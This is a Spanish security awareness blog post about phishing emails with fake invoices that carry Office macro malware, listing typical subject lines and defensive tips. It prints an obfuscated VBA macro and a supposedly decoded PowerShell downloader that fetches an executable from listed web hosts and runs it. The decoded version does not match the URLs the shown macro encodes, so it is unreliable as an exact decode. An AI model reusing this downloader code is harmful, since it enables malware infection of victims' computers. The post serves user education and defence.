Atacan con falsas facturas a través del correo.

Muchas son los métodos de ataques informáticos hoy en día. Pero lo clásico se pone nuevamente de moda. Delincuentes atacan con falsas facturas a través del correo electrónico. A diario el personal del área de tecnología se debe enfrentar con campañas de correos electrónicos fraudulentos. La única intensión de estos correos es infectar el equipo. ¿Cómo? Mediante un archivo adjunto de Office con macros visual basic, es decir macro malware. Los archivos adjuntos simulan ser una factura. ¿Porque factura? Porque se está implementado la facturación electrónica en el país. Como curiosidad en esta campaña, indicar que muchos de los destinatarios pertenecen al dominio del ámbito laboral.

¿Quién se ve afectado?

El ataque por falsas facturas con macro malware afecta a cualquier usuario que tenga una cuenta de correo electrónico corporativa de entidades bajo el ojo del atacante. A pesar que son ataques focalizados, usted puede ser víctima.

¿Cómo se identifican?

Estos correos se pueden identificar por dos características. La primera es que los correos es que tienen archivos adjuntos de Microsoft Word o Excel. La segunda es el asunto del correos. Los asuntos de los correos electrónicos fraudulentos detectados son: Envío de factura PDF al cliente, Factura, Fwd: facturas, COPIAS, factura mes (Enero, Febrero, Marzo, etc.), RE: factura (Enero, Febrero, Marzo, etc.), COPIAS + FACTURAS, Re: copia, Enviado por correo electrónico: Factura. Todos los correos hacen referencia a una factura.

¿Solución?

No baje la guardia y permanezca atento. Si se cuela en su bandeja de entrada algún e-mail cuyo asunto es igual o parecido a los que hemos descrito, elimínelo inmediatamente. En ningún caso descargue y/o abra el archivo adjunto. Si necesita ayuda o tiene dudas de la autenticidad de un correo, consulte al área de soporte de su compañía.

Recomendaciones para evitar ser víctimas de ataques a través del correo

Evite ser víctima de elementos maliciosos ocultos en archivos adjuntos de los correos:

  • No abra correos de usuarios desconocidos o que no haya solicitado, elimínelos directamente.
  • No conteste en ningún caso a estos correos.
  • Precaución al seguir enlaces en correos, aunque sean de contactos conocidos.
  • Precaución al descargar archivos adjuntos de correos, aunque sean de contactos conocidos.

La gran mayoría de los correos detectados suplanta a una entidad o persona, pero realmente todos ellos se están enviado desde servicios de correo electrónico gratuitos como Outlook, Gmail y Hotmail. Sin embargo, los delincuentes que atacan con falsas facturas a través del correo electrónico ahora compran dominios similares a los reales. Así envían las notificaciones de factura electrónica. Por lo general, intenta que usted descargue y abra el archivo que se incluye en el mensaje. La redacción de mensajes de correo electrónico suele tener un tono de urgencia. Por lo general, los mensajes de correo electrónico falsificados no son personalizados, aunque los mensajes válidos de su banco o empresa de comercio electrónico generalmente lo son.

Ejemplo de macro malware

En el siguiente ejemplo se puede ver un script de Visual Basic que tiene una función con “ofuscación” para descargar desde una URL un ejecutable para después correrlo en el computador de la víctima :

Rem Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Function jZLUvwMs()
Dim XqNwhS(3)
XqNwhS(0) = Right(MMUwpo, 607)
XqNwhS(1) = Mid(QVkuOnz, 617, 764)
XqNwhS(2) = Right(MMUwpo, 607)
wUNoKjdcW = Format(Chr(9 + 9 + 14 + 8 + 59)) + "md /V^:/" + Format(Chr(6 + 6 + 10 + 5 + 40)) + Format(Chr(3 + 3 + 4 + 2 + 22)) + "^s^et ^pWA^h=  ^   ^   ^  ^   " + "^    ^}^}^{h" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "^ta" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "}^;^kaer^b" + ";Uq^j$ ^" + "m^et^I-e^k^ovn^I;)Uqj$ ,iT^h$("
Dim hCiFkO(2)
hCiFkO(0) = Mid(QVkuOnz, 617, 764)
hCiFkO(1) = Left(zDZjGcDQ, 16)
   Dim zcEsU(2)
zcEsU(0) = Right(MMUwpo, 607)
zcEsU(1) = Left(zDZjGcDQ, 16)
nEJwmpSqMS = "^el^iF^d^a^oln^w" + "^o^D.kGK${yr^t{)nR^L$^ " + "n^i i^Th^$(^h" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "^a" + "^erof^;^'^e^xe.'+^ZL^W^$+'^\" + "'^+" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "ilbu^p^:vn^e^$^=Uq^j^$^;'^" + "552^' ^=^ Z^LW$;)'^@^'(ti^l^pS" + ".'W^bf^" + "X3Z^i^t^0o/^z^i^b.^ak^ooo//" + ":^pt^t^h@^5y^wD" + "n7^Un2u/mo" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "^.n^oit" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "^e^le" + "^ss^p//:p^tt^h^@^I5" + "h^h^ta^lH/^ln^.b^" + "b^o^o^ts//^:ptt^h^@^"
Dim zrJVm(5)
zrJVm(0) = Left(zDZjGcDQ, 16)
zrJVm(1) = Mid(QVkuOnz, 617, 764)
zrJVm(2) = Mid(QVkuOnz, 617, 764)
zrJVm(3) = Right(MMUwpo, 607)
zrJVm(4) = Mid(QVkuOnz, 617, 764)
   Dim cphDZE(3)
cphDZE(0) = Right(MMUwpo, 607)
cphDZE(1) = Right(MMUwpo, 607)
cphDZE(2) = Right(MMUwpo, 607)
   Dim HrwmD(3)
HrwmD(0) = Left(zDZjGcDQ, 16)
HrwmD(1) = Mid(QVkuOnz, 617, 764)
HrwmD(2) = Mid(QVkuOnz, 617, 764)
Disminn = "sB8^8^4S" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "^Y" + Format(Chr(6 + 6 + 10 + 5 + 40)) + "/ln^.^egar^po^" + "s^a^p//^:p^t^th^@^BR^M^5^K^0^k" + "/rb^.mo" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "^.^ot^t^efr" + "^epop^urg//" + ":^p^tt^h^'^=nRL^$;tnei^l" + Format(Chr(6 + 6 + 10 + 5 + 40)) + "^b" + "eW^.teN " + "^t" + Format(Chr(9 + 9 + 14 + 8 + 59)) + "^e^j^b^o^-^" + "wen=kG^K^$^ l^l^ehsrew^o^p&&" + "^f^or /^L %" + "N ^in (^36^3^;^-^1^;^0)d" + "^o ^se^t 4^Iw^s=!4^Iw^"
Dim vadnLC(5)
vadnLC(0) = MidB(vTWUCzKs, 897, 56)
vadnLC(1) = Left(zDZjGcDQ, 16)
vadnLC(2) = Mid(QVkuOnz, 617, 764)
vadnLC(3) = Mid(QVkuOnz, 617, 764)
vadnLC(4) = Mid(QVkuOnz, 617, 764)
   Dim OIGBKB(5)
OIGBKB(0) = Left(zDZjGcDQ, 16)
OIGBKB(1) = Right(MMUwpo, 607)
OIGBKB(2) = Left(zDZjGcDQ, 16)
OIGBKB(3) = MidB(vTWUCzKs, 897, 56)
OIGBKB(4) = Mid(QVkuOnz, 617, 764)
   Dim uMOslR(4)
uMOslR(0) = MidB(vTWUCzKs, 897, 56)
uMOslR(1) = Mid(QVkuOnz, 617, 764)
uMOslR(2) = Right(MMUwpo, 607)
uMOslR(3) = Mid(QVkuOnz, 617, 764)
rYuuBiNDjUZ = "s!!^pWA^" + "h:~%N,1!&&^if %N=^=^0 " + Format(Chr(9 + 9 + 14 + 8 + 59)) + "^a^l^l %" + "4^Iw^s:^~^-^3^6^4%" + Format(Chr(3 + 3 + 4 + 2 + 22)) + ""
jZLUvwMs = wUNoKjdcW + nEJwmpSqMS + Disminn + rYuuBiNDjUZ
   Dim XHEap(5)
XHEap(0) = Left(zDZjGcDQ, 16)
XHEap(1) = Right(MMUwpo, 607)
XHEap(2) = Left(zDZjGcDQ, 16)
XHEap(3) = Left(zDZjGcDQ, 16)
XHEap(4) = Right(MMUwpo, 607)
   Dim jHWZLT(3)
jHWZLT(0) = MidB(vTWUCzKs, 897, 56)
jHWZLT(1) = Right(MMUwpo, 607)
jHWZLT(2) = Mid(QVkuOnz, 617, 764)
   Dim FPCKd(3)
FPCKd(0) = Right(MMUwpo, 607)
FPCKd(1) = Left(zDZjGcDQ, 16)
FPCKd(2) = Right(MMUwpo, 607)
End Function
End Function

El codigo de arriba, realmente es:

powershell $jir=newobject Net.WebClient;
$sNw='
	http://harryliwen.net/KJRC3aWl@
	http://mrhanhphuc.com/HZggbn9vNI@
	http://ncsquared.com/wdzR5yn@
	http://nfog2018.dk/rTp7euMEO@
	http://minstech.com/xYUEJJDX8
'.Split('@');
$Hww = '189';
$nQc=$env:public+''+$Hww+'.exe';
foreach($aSj in $sNw){
	try{
	$jir.DownloadFile($aSj, $nQc);
InvokeItem $nQc;
break;
}catch{
	}}                 

Autor: José Guillermo Ortiz Hernández
Editor: Carlos Pinzón.
Código: UCP2-6

Fuentes

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *